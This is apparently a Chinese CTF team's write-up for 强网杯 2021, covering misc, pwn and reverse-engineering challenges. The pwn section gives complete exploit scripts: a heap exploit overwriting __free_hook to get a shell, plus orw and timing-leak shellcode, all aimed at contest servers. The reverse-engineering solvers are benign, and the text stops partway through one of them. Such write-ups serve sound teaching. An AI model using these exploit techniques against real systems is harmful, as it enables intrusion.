强网杯 2021 WriteUp - CNSS

Misc

签到

flag{welcome_to_qwb_s5}

问卷题

填问卷

CipherMan

memory 文件为 win7 内存镜像

扫一下文件可以找到 BitLocker 的恢复密钥

用 bdemount 和恢复密钥挂载 Secret 有一个 NTFS 分区

挂载分区找到 README.txt 文件内容即为 flag

PWN

baby_diary

from pwn import *
from easypwn import *
import os
import sys
context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : pA.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)
r=run('./pp','231','092')
p=remote("8.140.114.72",1399)
def add(ind,size,ss=b''):
    sla('>>','1')
    sla('size',str(size))
    if(size!=len(ss)):
        ss+=b'\n'
    sa('content',ss)
def dele(ind):
    sla('>>','3')
    sla('index',str(ind))
    
def show(ind):
    sla('>>','2')
    sla('index',str(ind))
    #   byte(p+size+1)==2*n+bytesum(p)
raw='''
0x1716
0x187c
0x17D7
set $addlist=(unsigned long*)$rebase(0x4060)
set $sizelist=(unsigned long*)$rebase(0x4140)
''' #add dele 
for i in range(7):
    add(i,0x27)
add(7,0x107)
add(8,0x507)
add(9,0x4f7)
add(10,0x457)
add(11,0x27)
dele(8)
add(8,0x27,ropx(0x55,0x500))
add(12,0x27)
add(13,0x477,ropx(0))
add(14,0x27)
add(15,0x47)
dele(10)
add(10,0x27)
for i in range(7):
    dele(i)
dele(12)
dele(10)
add(0,0x457,ropx(0x5))
for i in range(7):
    add(i,0x27)
add(12,0x27)
for i in range(1,7):
    dele(i)
dele(11)
dele(12)
dele(8)
for i in range(7):
    add(i,0x27)
add(11,0x27)
dele(14)
add(12,0x27,ropx([0x27]))
dele(12)
add(12,0x27,ropx(0x5,[0x18]))
dele(9)
add(9,0x47)
show(13)
ru('content: ')
r.libc_base=u64(rn(6).ljust(8,b'\x00'))-r.symbol['main_arena']-96
dele(15)
dele(9)
dele(11)
add(9,0x27,ropx([0x10],r.symbols('__free_hook')))
add(11,0x47,ropx('/bin/sh\x00'))
add(15,0x47,ropx(r.symbols('system')))
# r.bp(raw=raw)
dele(11)
p.interactive()

[强网先锋]orw

from pwn import *
from easypwn import *
import os
import sys
context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)

r=run('./p1','223','0112')
p=r.p
# # -1-1  0-8
def add(ind,ss):
    sla('>>','1')
    sla('index',str(ind))
    size=len(ss)
    sla('size',str(size))
    sa('con',ss)
def dele(ind):
    sla('>>','4')
    sla('index',str(ind))
def q():
    sla('>>','5')
raw='''
set $a=(unsigned long*)$rebase(0x2020A0)
0xEC7
0xFE7
0x10A5
'''
p=remote("39.105.131.68",12354)
sh='''
push rsp
pop rsi
push rdi
pop rax
push rdi
pop rdx
jmp .+0x1a
'''
# r.bp(raw=raw)
add(-13,asm(sh).ljust(8,b'\x90'))
sh='''
mov dl,0xff
syscall
call rsp
'''
add(0,asm(sh).ljust(8,b'\x90'))
q()
sh='''
xor rax,rax
push rax
push rax
inc rax
inc rax
pop rsi
pop rdx
mov r9,{}
push r9
push rsp
pop rdi
syscall
xchg rax,rdi
xor rax,rax
mov rsi,rbp
add rsi,0x200
xchg r11,rdx
syscall
xor rax,rax
push rax
pop rdi
inc rdi
inc rax
syscall
'''.format(str2hex("flag\x00"))
sd(asm(sh))
p.interactive()

[强网先锋]shellcode

from pwn import *
from easypwn import *
import os
import sys
import datetime
context.terminal=['tmux','splitw','-h']
# context.log_level='DEBUG'
context.arch='amd64'
context.bits=64
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)

off=0
# jmp $+4
# jmp $+7
# call $-2

s1='''
push 9
pop rax
xor rdi,rdi
mov rsi,rdi
inc rdi
shl rdi,16
inc rsi
shl rsi,12
push 7
pop rdx
push 0x22
pop rcx
xor r8,r8
xor r9,r9
dec r8
syscall
mov rsi,rax
xor rax,rax
push rax
push rax
pop rdi
pop rdx
inc rdx
shl rdx,11
add rsi,rdx
syscall
mov rsp,rsi
push 0x23
push rsi
retfq
'''
s2='''    
push 0
push 0x67616c66
mov ebx,esp
xor ecx,ecx
push 5
pop eax
int 0x80
push 0x33
push 0x10818
retf
'''

var=0x66
sss=[]

while True:
    for var in range(0x20,0x7f):
        s3='''
        push 3
        pop rdi
        xor rax,rax
        mov rsi,rax
        inc rsi
        shl rsi,16
        push 0xff
        pop rdx
        syscall
        mov bl,%d
        xor rdi,rdi
        xor eax,eax
        cmp bl,byte ptr [rsi+%d]
        jne $+7
        mov eax,231
        syscall
        '''%(var,off)
        logx(chr(var))
        # r=run('./pp','223')
        p=remote('39.105.137.118',50050)    
        # p=r.p
        ss1=asm(s1,arch='amd64',bits=64)
        ss2=asm(s2,arch='i386',bits=32)
        ss3=asm(s3,arch='amd64',bits=64)
        open('in','wb').write(ss1)
        os.system('python2 alpha3/ALPHA3.py  x64 ascii mixedcase RBX --input="in" > out')
        res=open('out','r').read()
        # r.bp(0x40026D)
        sd(res)
        sleep(0.1)
        sd(ss2+ss3)
        starttime = datetime.datetime.now()
        p.recvrepeat(timeout=0.1) 
        endtime = datetime.datetime.now()
        if ((endtime - starttime).microseconds)<=40000:
            off+=1
            sss.append(var)
            break
    if var==0x7d:
        break
    
# # 0x400000
print(''.join([chr(i) for i in sss]))

Re

ezmath

if ( strlen(s) == 38 )
 {
   for ( i = 0; i <= 37; i += 2 )
   {
     if ( dbl_4020[i / 2] != sub_13F3(*(unsigned __int16 *)&s[i]) )
       goto LABEL_2;
   }
   puts("correct");
   result = 0LL;
 }
double __fastcall sub_13F3(int a1)
{
 int i; // [rsp+8h] [rbp-Ch]
 double v3; // [rsp+Ch] [rbp-8h]

 v3 = 0.2021;
 for ( i = 8225; i < a1; ++i )
   v3 = 2.718281828459045 - (double)i * v3;
 return v3;
}

s 为输入

*(unsigned __int16 *)&s[i]) 这是取了两位char为一个int，我们可以把他当成一个int

#include <iostream>
#include <cstdio>
long double dbl_4020[19] =
{
   0.00009794904266317233,
   0.00010270456917442,
   0.00009194256152777895,
   0.0001090322021913372,
   0.0001112636336217534,
   0.0001007442677411854,
   0.0001112636336217534,
   0.0001047063607908828,
   0.0001112818534005219,
   0.0001046861985862495,
   0.0001112818534005219,
   0.000108992856167966,
   0.0001112636336217534,
   0.0001090234561758122,
   0.0001113183108652088,
   0.0001006882924839248,
   0.0001112590796092291,
   0.0001089841164633298,
   0.00008468431512187874
};
long double b[1000000];
void dabiao(int a1)
{
    int i; // [rsp+8h] [rbp-Ch]
    long double v3; // [rsp+Ch] [rbp-8h]

    v3 = 0.0004829108052495089;
    // printf("%llf\\n",v3);
    for ( i = 8225; i < a1; ++i )
        v3 = 2.718281828459045 - (long double)i * v3;
    b[a1] = v3;
}
int main()
{
    printf("OK\\n");
    for(int i = 0;i <= 8225;i++)
        b[i] = 0.0004829108052495089;
    for(int i = 8225;i < 1000000;i++)
        dabiao(i);
    printf("OK\\n");
    int j = 0;
    while(j < 19)
    {
        for(int i = 0;i < 1000000;i++)
        {
            if(b[i] == dbl_4020[j])
            {
                printf("0x%h",i);
                j++;
                break;
            }
        }
    }
    return 0;
}

这里有smc（应该）,它好像path了那个v3，我在看

__int64 sub_1391()
{
  __int64 result; // rax

  mprotect((void *)((unsigned __int64)(&qword_2018 - 1) & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);
  result = ((double (__fastcall *)(__int64 (__fastcall *)(), double, double))((char *)&unk_11C8 + 1))(
             sub_1301,
             0.0,
             1.0);
  *(&qword_2018 - 1) = result;
  return result;
}

nop edx是啥

混淆的，可以path掉push rbx和nop edx，就正常了

真正的v3，它好像无反调试，我tm直接动态看结果

v3 = 0.0004829108052495089;
 for ( i = 8225; i < a1; ++i )
   v3 = 2.718281828459045 - (double)i * v3;
 return v3;

说起来 2.718281828459045 是不是 e 啊

打表写不了

import binascii
table=[
   0.00009794904266317233,
   0.00010270456917442,
   0.00009194256152777895,
   0.0001090322021913372,
   0.0001112636336217534,
   0.0001007442677411854,
   0.0001112636336217534,
   0.0001047063607908828,
   0.0001112818534005219,
   0.0001046861985862495,
   0.0001112818534005219,
   0.000108992856167966,
   0.0001112636336217534,
   0.0001090234561758122,
   0.0001113183108652088,
   0.0001006882924839248,
   0.0001112590796092291,
   0.0001089841164633298,
   0.00008468431512187874
]

for i in table:
    s=hex(int(2.718281828459045/i))
    print(s,end=',')

#include <cstdio>
unsigned short s_[]={0x6c67,0x6762,0x737c,0x6162,0x5f6e,0x6965,0x5f6e,0x6568,0x5f6a,0x656d,0x5f6a,0x616b,0x5f6e,0x6164,0x5f62,0x6974,0x5f6f,0x616d,0x7d62,0};
int main(){
    char *s=(char *)s_;
    for (int i=0;i<38;i++) if (i%2==0) s[i]--;
    printf("%s",s);
}

unicorn_like_a_pro

• 用于恢复 binary

  block_table = [0x02F73020, 0x00000015, 0x09D3473A, 0x00000051, 0x0EF87B55, 0x0000000D, 0x147CB028, 0x00000023, 0x15F833AA, 0x00000030, 0x17086780, 0x00000018, 0x1733A9D4, 0x00000014, 0x17D61EE8, 0x00000051, 0x1D52F19E, 0x00000011, 0x1F732DE0, 0x0000000D, 0x1FBECFAD, 0x0000001B, 0x245BD7C8, 0x00000055, 0x25E7ABEE, 0x00000009, 0x2882C190, 0x000000A2, 0x2A2084A0, 0x00000075, 0x326AA6AE, 0x00000036, 0x33074A36, 0x00000024, 0x3440BD69, 0x0000002C, 0x362A1FC3, 0x0000002C, 0x3C0450D0, 0x0000000D, 0x3CB575FD, 0x00000011, 0x41B3B26E, 0x0000004E, 0x46005120, 0x00000011, 0x465A72CF, 0x00000002, 0x492145A0, 0x0000000D, 0x49AA4CE0, 0x0000002D, 0x4BD63647, 0x0000004E, 0x4BF84A87, 0x0000000D, 0x4D102445, 0x00000033, 0x4D4D3C55, 0x0000001B, 0x53723232, 0x0000000A, 0x5809B5CB, 0x000000A2, 0x5B12FFCE, 0x00000015, 0x5B1F3000, 0x00000051, 0x5D9FBD20, 0x00000027, 0x6219EED9, 0x0000008A, 0x65D82D17, 0x0000004C, 0x67F5671A, 0x00000063, 0x6CE2CBC1, 0x00000033, 0x718A739C, 0x0000000B, 0x71A62DD7, 0x00000015, 0x7693A1F6, 0x00000014, 0x7A473FB0, 0x00000047, 0x7AEFEDDC, 0x00000011, 0x7AF2CF90, 0x0000004F, 0x7BE0B8B0, 0x0000001B, 0x80EB3E88, 0x0000000A, 0x8213506A, 0x0000000C, 0x82468114, 0x00000011, 0x86B872A2, 0x0000001C, 0x87FBD296, 0x00000019, 0x88719339, 0x00000016, 0x89E2630A, 0x00000024, 0x8CB6536E, 0x0000004E, 0x92316E00, 0x00000015, 0x9415A51E, 0x0000004F, 0x94D658E0, 0x0000002B, 0x97E8DFCD, 0x00000036, 0x992E3874, 0x0000002A, 0x9B06958D, 0x00000030, 0x9B36B480, 0x0000000D, 0xA03CEFAD, 0x0000005A, 0xA39F47E6, 0x0000004E, 0xA946DEC4, 0x000000B4, 0xAE6173DC, 0x00000051, 0xB044A68D, 0x0000008C, 0xB29E36A8, 0x0000000B, 0xB82781F4, 0x0000000D, 0xC14DFAF8, 0x00000011, 0xC3F42E20, 0x0000001E, 0xC5E0065E, 0x00000067, 0xCAD68B21, 0x00000039, 0xCBF29AC7, 0x00000011, 0xCE8729BC, 0x0000001B, 0xD2A85A94, 0x00000004, 0xD34FA4F3, 0x00000011, 0xD64611B0, 0x00000058, 0xD814FD56, 0x00000018, 0xDD386A80, 0x0000000A, 0xDE82DFAC, 0x00000011, 0xEC68D16F, 0x0000001B, 0xEEDE845B, 0x0000003F, 0xF235F260, 0x0000008D, 0xF9AA1F0B, 0x00000087, 0xFC200887, 0x00000011, 0xFED657A3, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
  
  jmp_table = [0x00412F5E, 0xFFFFFA22, 0x14252652, 0xFFFFF9AC, 0x66CEF8EC, 0x0251D934, 0x0000009F, 0xC56FBF59, 0xFFFFFF61, 0xAA4D5B7C, 0x02745896, 0xFFFFFB7F, 0x34B6D31E, 0xFFFFFBB0, 0x302CC828, 0x02AC5992, 0xFFFFF524, 0x67CC4064, 0xFFFFF483, 0x8A5D9B26, 0x046254D0, 0xFFFFFC37, 0x074AB936, 0xFFFFFC7F, 0xB8EA37F7, 0x0CACD9FE, 0x0000007F, 0x6112F222, 0x00000002, 0x47A72561, 0x0F0FE6EB, 0xFFFFFBAE, 0x0A1411E7, 0xFFFFFC85, 0x3BE88B46, 0x0FC59DC2, 0xFFFFF72F, 0x7D12A5EF, 0xFFFFF691, 0xE67393D6, 0x10B1EBCA, 0x000001CF, 0x473A1295, 0x0000022E, 0x7BC15385, 0x1565D41D, 0xFFFFFDC4, 0x05D337BE, 0xFFFFFE7E, 0xE12982E4, 0x18909E40, 0x000005EB, 0xAE2337AF, 0x000005B1, 0x8E0AB2ED, 0x1AE7593A, 0xFFFFF3BC, 0x23E9058D, 0xFFFFF40B, 0xDFA6CF3E, 0x1B47DA81, 0xFFFFF8C3, 0x349CC616, 0xFFFFF7E9, 0x70C290D0, 0x1D816435, 0x00000002, 0x43F999C9, 0xFFFFFFD8, 0xAB0BCA16, 0x1DACC905, 0xFFFFFF54, 0x5C129962, 0xFFFFFD06, 0xE4515A41, 0x1E03B13C, 0xFFFFFF80, 0x7E763806, 0xFFFFF36A, 0xA25F3D93, 0x22FEFC06, 0xFFFFFCDD, 0xB94E0C2F, 0xFFFFFCB6, 0xF023033D, 0x26B1E690, 0xFFFFFDAB, 0xD0C7ED0C, 0xFFFFFE9B, 0xD49872C6, 0x2A652084, 0x000001EA, 0xDF9B65EE, 0x00000051, 0x5CC5AB90, 0x2FBEBD25, 0x0000048F, 0x60A4E9F2, 0x000009AF, 0x42FE8B0D, 0x34F12D90, 0x000004C0, 0xF6257D94, 0x00000480, 0x5227DE21, 0x35F591D0, 0xFFFFFCA1, 0xDA83E113, 0xFFFFF998, 0x805C7ECB, 0x37EB0B72, 0xFFFFF3EC, 0x7480201A, 0xFFFFF903, 0xAC977E11, 0x389A58A8, 0x00000189, 0xE4005CD7, 0xFFFFFDEC, 0xB043695F, 0x3CB24155, 0x0000084C, 0x8ACB6FF1, 0x00000899, 0xACB471A5, 0x3DCBCDE3, 0x000007A8, 0xA84E3072, 0x00000384, 0xB2624259, 0x3F5290DE, 0xFFFFFE25, 0x8AC11F92, 0xFFFFFD8A, 0x44ACCD78, 0x47FF9B7E, 0x00000A81, 0x9833BF9C, 0x00000B35, 0x9B7199CD, 0x4C7867E6, 0x0000011C, 0x68BB4F80, 0x0000002E, 0x75B675CD, 0x53ADCD80, 0x000004E8, 0x6AA4F705, 0x00000452, 0xBA7C314B, 0x566E1640, 0x00000C8E, 0x203E3737, 0x00000C38, 0xF9367ED9, 0x5EDBB130, 0x000004FF, 0xD4F71A40, 0x000002AA, 0x35DC4141, 0x6C29C83A, 0x00000013, 0xBEAD8A76, 0xFFFFFFB5, 0x7A8A43EF, 0x6E036C9C, 0x00000BD5, 0x225F81E0, 0x00000D89, 0x3C25944D, 0x6FDCCE50, 0x00000605, 0xD3126740, 0x000003D5, 0xA3DA544C, 0x7132D345, 0x0000064E, 0x00915A5A, 0x000006DD, 0x5BCB6B22, 0x720DBD5C, 0x000008C3, 0x64DCFDF6, 0x00000858, 0x190B20BB, 0x7A035AD4, 0x00000424, 0x4DD955FB, 0x000004BF, 0xF65150B5, 0x7CBAED22, 0x00000AA1, 0x62CC154B, 0xFFFFFC58, 0x8DD5CEDB, 0x7EBF8EA8, 0x00000458, 0xCE844A0E, 0xFFFFF734, 0x9079D6BA, 0x804885CD, 0x000007BB, 0x89A8DA66, 0x00000136, 0x7185B813, 0x82190F37, 0xFFFFF58C, 0x013FA7D4, 0xFFFFF4AB, 0x7518093D, 0x83F7826A, 0x00000917, 0x2F33C3DD, 0xFFFFFBF0, 0x02A289B1, 0x8481BFD5, 0xFFFFF927, 0x72EED2D1, 0xFFFFF80A, 0xF46FD351, 0x85A69D6E, 0x000000B4, 0x27A3BB0F, 0x00000181, 0x49235BC0, 0x85F73150, 0x00000259, 0xA300692F, 0x000009BD, 0x5A3E46A9, 0x86E2497A, 0xFFFFFB53, 0xE7614707, 0xFFFFFBB3, 0xFA190B2A, 0x8B261F60, 0xFFFFF323, 0x97B9CC33, 0xFFFFFAB7, 0x2CB73BF0, 0x8B42B00C, 0x00000871, 0xA57A2DE3, 0x00000797, 0xA73082D6, 0x8E4C5C94, 0x000000FE, 0xEE4B594B, 0xFFFFF999, 0xDCE3B74D, 0x913A9FDB, 0xFFFFFE1C, 0x1BFFA329, 0xFFFFFD31, 0x49B21C95, 0x922BFB96, 0xFFFFF61B, 0x4FAFD829, 0xFFFFFBBA, 0x6BD5D317, 0x9F4B8702, 0xFFFFFEC1, 0xB691AD49, 0xFFFFFEF2, 0xCE6C6FE9, 0xA2CEAAA6, 0xFFFFFD89, 0x60E52701, 0xFFFFFCB2, 0x25AD9A9D, 0xAA970D72, 0xFFFFF2BB, 0xC1F58CAC, 0xFFFFF2AB, 0x20B8FE22, 0xABC02B72, 0xFFFFF94B, 0xFF6EA5A6, 0xFFFFFA6A, 0x1CD46647, 0xAE535E9E, 0x000003EC, 0x31246F6B, 0x0000035B, 0x50E2A20A, 0xB7337941, 0xFFFFF856, 0xD1A79AD7, 0xFFFFF955, 0x14673B75, 0xBB8DB95E, 0xFFFFFEEB, 0x6A7F1E5A, 0xFFFFF3B3, 0x1EF2F3AA, 0xBC1EDA22, 0xFFFFFB90, 0xE247955F, 0xFFFFFCE6, 0xA0351A85, 0xBCD91FE8, 0x0000008C, 0x71A348B9, 0x00000030, 0x821754EF, 0xBD38E305, 0xFFFFFF59, 0xE694333F, 0xFFFFFEF9, 0x436B1A45, 0xBE1AA65A, 0xFFFFF93D, 0x8761A810, 0xFFFFFEEB, 0xB2DB19FA, 0xC052453C, 0x000009B5, 0xB05027D7, 0x000009C5, 0xBCA91679, 0xC4A2D780, 0x000008B9, 0xE42FD068, 0x000007C1, 0x9F8B2B83, 0xC6A236BA, 0xFFFFFDBB, 0x20649A12, 0xFFFFFD09, 0x5F73FD94, 0xC6BB5160, 0xFFFFFE90, 0x0ED42674, 0xFFFFFF4B, 0xA76699CC, 0xCB74E940, 0x000003E3, 0x7DA194FF, 0xFFFFFCDA, 0xB23E5B15, 0xD027B387, 0xFFFFF701, 0x880BCC4F, 0xFFFFF785, 0xFEA3D685, 0xD1127D6B, 0xFFFFFAC0, 0xDF3D499A, 0x00000362, 0x84B7777D, 0xD6F5F913, 0xFFFFFCCD, 0xA5D89DB8, 0xFFFFFCAB, 0xF69BAE29, 0xDD04F828, 0xFFFFF705, 0xE18F3BA0, 0xFFFFF64D, 0xEBC799B0, 0xDDF22CB8, 0x0000075D, 0x47F7B857, 0x000001B3, 0x5C1CDEA9, 0xDF34D0A8, 0x0000014D, 0xBFE2CAD5, 0x00000201, 0x1F0C8A89, 0xE146EA40, 0x0000046D, 0x189EB8F9, 0xFFFFF6FB, 0x4CA1090D, 0xE231C560, 0x00000710, 0x2E586529, 0xFFFFFF17, 0x0E9AA776, 0xE2FC6838, 0x00000733, 0xB73DDD7A, 0x00000753, 0x14A1BDE4, 0xE44AE35D, 0x000002C8, 0x46B1F3D1, 0xFFFFFA2D, 0xD2295816, 0xE5AF4AB1, 0x00000DB0, 0x0AFF4FF9, 0x00000D91, 0xB17A4340, 0xE7E3CF21, 0x00000656, 0x9FC50924, 0x00000658, 0x31615022, 0xE8815965, 0x00000BCB, 0x6F51A655, 0x00000C0A, 0x72F5680C, 0xEBDF0F14, 0xFFFFF2B1, 0xD36EC5D4, 0xFFFFF239, 0x3B711343, 0xEC12E59B, 0x00000270, 0x3A38D2E8, 0x0000023D, 0x68D07674, 0xF4013920, 0x00000703, 0xD83CCFAA, 0x000007BA, 0x46891EEB, 0xF6847EC1, 0xFFFFFE62, 0x6D4BAAFC, 0xFFFFFD92, 0x5E6F5A94, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
  
  class Block:
      addr = 0
      size = 0
      left = 0
      right = 0
      code = b""
  
      def __init__(self, addr, size, left, right, code = b"") -> None:
          self.addr = addr
          self.size = size
          self.left = left
          self.right = right
          self.code = code
  
  DWORD = lambda x:x&0xFFFFFFFF
  alg = lambda x,y:x^y^DWORD(x*y)^DWORD(x+y)
  
  def recover(addr, data):
      if addr in addr_list:
          return
      if addr == 0x10a3:
          block_list.append(Block(addr, 0, 0x1eec, 0x1eec, b""))
          recover(0x1eec, DWORD(data+0xD4F64670))
          return
      addr_list.append(addr)
      token = alg(data, addr)
      size = -1
      for i in range(0x55):
          if block_table[2*i] == token:
              size = block_table[2*i+1]
              break
      if size == -1:
          # raise AssertionError()
          return
  
      tail = addr + size - 2
      token = alg(data, tail)
  
      for i in range(0x55):  
          if jmp_table[5*i] == token:
              left = jmp_table[5*i+1]
              right = jmp_table[5*i+3]
              recover(DWORD(tail+left), DWORD(data+jmp_table[5*i+2]))
              recover(DWORD(tail+right), DWORD(data+jmp_table[5*i+4]))
  
              code_block = code[addr-0x1000: addr-0x1000+size-2]
              xor_data = list(data.to_bytes(4, "little"))
              code_block = list(code_block)
              for i in range(size-2):
                  code_block[i] ^= xor_data[i%4]
              code_block = bytes(code_block)
              block_list.append(Block(addr, size-2, DWORD(tail+left), DWORD(tail+right), code_block))
              break
  
  with open("origin_code", "rb") as f:
      code = f.read()
  
  addr_list = []
  block_list = []
  recover(0x1000, 0x3265B1F5)
  block_list.sort(key=lambda x:x.addr)
  addr_list.sort()
  
  def get_block_idx(addr):
      for i in range(len(block_list)):
          if addr == block_list[i].addr:
              return i
  paddr = 0x1000
  with open("recover_code22", "wb") as f:
      for i, b in enumerate(block_list):
          if paddr == 0x15ab:
              print("HERE: %s" % hex(b.addr))
          f.write(b.code)
          j = get_block_idx(b.left)
          if not j:
              left = 0
          elif i >= j:
              left = len(b.code) + 6
              for ii in range(j, i):
                  left += len(block_list[ii].code)+12
              left = -left
          else:
              left = 6
              for ii in range(i+1, j):
                  left += len(block_list[ii].code)+12            
  
          jmp_flag = 0
          k = get_block_idx(b.right)
          if not k:
              right = 0
          elif i >= k:
              right = len(b.code) + 12
              for ii in range(k, i):
                  right += len(block_list[ii].code)+12
              right = -right
          else:
              right = 0
              jmp_flag = 1
              for ii in range(i+1, k):
                  right += len(block_list[ii].code)+12
  
          if left == 0 and right != 0:
              left = right + 6
          elif left != 0 and right == 0 and jmp_flag == 0:
              right = left - 6
          elif left == 0 and right == 0:
              left = 5000
              right = 5000
              print("\\nERROR")
              print(hex(b.addr), end="")
  
          f.write(b"\\x0f\\x85") # jz
          f.write((DWORD(left )).to_bytes(4, "little"))
          f.write(b"\\x0f\\x84") # jnz
          f.write((DWORD(right)).to_bytes(4, "little"))
          paddr += len(b.code)+12
  
  def done():
      while(1):
          try:
              addr = int(input(), base=16)
          except:
              continue
          for b in block_list:
              if addr >= b.addr and addr < b.addr + b.size + 12:
                  print("Jz  :0x%x" % b.left)
                  print("Jnz :0x%x" % b.right)
              break

• 爆破 time(0)

  #include "ida.h"
  #include "stdio.h"
  #include "stdlib.h"
  #include "time.h"
  
  size_t now = 0x60c5c238;
  size_t range = 0xF0C0*2;
  size_t xx;
  void set_number(size_t n)
  {
  	xx = n;
  }
  size_t get_number()
  {
  	size_t t = xx;
  	xx = 0x756E69636F726E03 * xx + 0xBADC0DEC001CAFE;
  	return xx;
  }
  
  int test(size_t n)
  {
  	size_t i, t1, t1_1, t2, t2_1, x;
  	x = n;
  	set_number(0x7177625F32303231);
  	for (i = 0; i != 256; ++i)
  	{
  		t1 = get_number();
  		t1_1 = t1;
  		t2 = get_number(); // readfsqword
  		t2_1 = t2;
  		x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13); // __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
  		if ((i & 1) != 0)
  			x = t2_1 ^ (t1_1 + x);
  		if ((i & 2) != 0)
  			x ^= t1_1 + t2_1;
  		if ((i & 4) != 0)
  			x ^= t2_1 ^ t1_1;
  		if ((i & 8) != 0)
  			x += t1_1 + t2_1;
  	}
  	printf("0x%llx", x);
  	if (x == 0x1C986C3B22EA63E5){
  		printf("\\nYES\\n");
  		printf("0x%llx", n);
  		exit(0);
  	}
  	return 0;
  }
  
  int test2()
  {
  	size_t i, j, t1, t1_1, t2, t2_1, x;
  	size_t v39, v0;
  	printf("[");
  	set_number(0x5249415452455451);
  	for (j = 0; j != 32; j++){
  		v39 = get_number();
  		v0 = v39;
  		x = j;
  		for (i = 0; i != 256; ++i)
  		{
  			t1 = get_number();
  			t1_1 = t1;
  			t2 = get_number(); // readfsqword
  			t2_1 = t2;
  			x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13); // __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
  			if ((i & 1) != 0)
  				x = t2_1 ^ (t1_1 + x);
  			if ((i & 2) != 0)
  				x ^= t1_1 + t2_1;
  			if ((i & 4) != 0)
  				x ^= t2_1 ^ t1_1;
  			if ((i & 8) != 0)
  				x += t1_1 + t2_1;
  		}
  		printf("%u,", (v0 + x)&0xFF);
  	}
  	printf("]");
  	return 0;
  }
  
  int main()
  {
  	test2();
  	return 0;
  	//test(0x0000000060C58B03/0xe10);
  	for (size_t i = (now-range)/0xe10; i < now/0xe10; i++)
  	{
  		float p = (float)(i-(float)(now-range)/0xe10)/(float)(range/0xe10);
  		printf("\\r%llx\\t%f", i, p);
  		if (test(i))
  		{
  			printf("YES %llx", i);
  			exit(0);
  		}
  	}
  	printf("FAILED\\n");
  }

• 爆破 crc32

  #include <stdio.h>
  #include <stdint.h>
  #include <x86intrin.h>
  
  size_t data[8] = {299650393, 691998794, 68510124, 1960587641, 1360326369, 875761003, 4117139363, 485610796};
  int main(int argc, char *argv[]) {
  	for (int j=0; j<8; j++){
  		for (unsigned int i = 0; i <= 0xffffffff; i++) {
  			unsigned int res = _mm_crc32_u32(0, i);
  			if (res == data[j]) {
  				printf("0x%08x,", i);
  				break;
  			}
  		}
  	}
      return 0;
  }

• solve 脚本

  import struct
  cipher = [0x3EC81D9432CEF584, 0xB649A4DCD6BD24FE, 0xC5927F0B767A787D, 0x1F245B7F751BB52E]
  xor_data = [0x178DEC4F232DDB6E, 0xC2AAB7D6D2A167C3, 0xF1AB91F72761A80F, 0x3DCEDC28076C41A]
  rand_num = 0x6e191
  xor_data2 = [165,220,121,181,173,29,65,7,237,84,204,183,178,23,228,173,33,228,94,150,235,53,196,224,80,127,120,95,136,104,38,98]
  
  for i in range(4):
  	cipher[i] ^= xor_data[i]
  
  cipher = struct.pack("<4Q", cipher[0], cipher[1], cipher[2], cipher[3])
  cipher = struct.unpack("<8L", cipher)
  cipher = list(cipher)
  for i in range(len(cipher)):
  	cipher[i] -= rand_num
  print(cipher)
  
  cipher = [0xd218b0c3,0x65366cd6,0x85fc66b2,0xc1944883,0xe1019d40,0xbfac4182,0x3c111125,0x1f481ae7]
  cipher = struct.pack("<8L", cipher[0], cipher[1], cipher[2], cipher[3], cipher[4], cipher[5], cipher[6], cipher[7])
  cipher = list(struct.unpack("<32B", cipher))
  for i in range(32):
  	c = cipher[i]^xor_data2[i]
  	print(chr(c), end="")

StandOnTheGaints

int __fastcall Java_com_a_standonthegiants_MainActivity_check(int a1, int a2, int a3)
{
  int ptr; // r6
  const char *input; // r8
  size_t len; // r4
  int v7; // r2
  _BYTE *input__; // r10
  int input_; // r5
  _QWORD *ctx; // r11
  int i; // r0
  int v12; // r0
  int *num_3; // r5
  int len_; // r0
  unsigned __int8 *v15; // r4
  int len_1; // r10
  unsigned __int8 *out; // r5
  int v18; // r4
  int v21; // [sp+10h] [bp-110h] BYREF
  int v22; // [sp+14h] [bp-10Ch]
  _DWORD *num_2; // [sp+1Ch] [bp-104h] BYREF
  _DWORD *num_1; // [sp+20h] [bp-100h] BYREF
  _DWORD *input_0; // [sp+24h] [bp-FCh] BYREF
  char v26[216]; // [sp+28h] [bp-F8h] BYREF

  ptr = 0;
  input = (const char *)(*(int (__fastcall **)(int, int, _DWORD))(*(_DWORD *)a1 + 676))(a1, a3, 0);
  len = strlen(input);
  input__ = malloc(2 * len + 4);
  input_ = (int)input__;
  while ( len != ptr )
  {
    sub_52318(input_, -1, v7, (unsigned __int8)input[ptr]);// unhex
    input_ += 2;
    ++ptr;
  }
  ctx = BN_CTX_new_ex();
  sub_5249C((int)ctx);
  input_0 = BN_POOL_get(ctx);
  trans(&input_0, input__);                     // get input_0
  free(input__);
  num_1 = BN_POOL_get(ctx);
  num_2 = BN_POOL_get(ctx);
  qmemcpy(v26, &unk_2C6B0, 0xD1u);
  for ( i = 0; i != 209; ++i )
    v26[i] ^= '=';
  trans(&num_1, v26);                           // get num_1
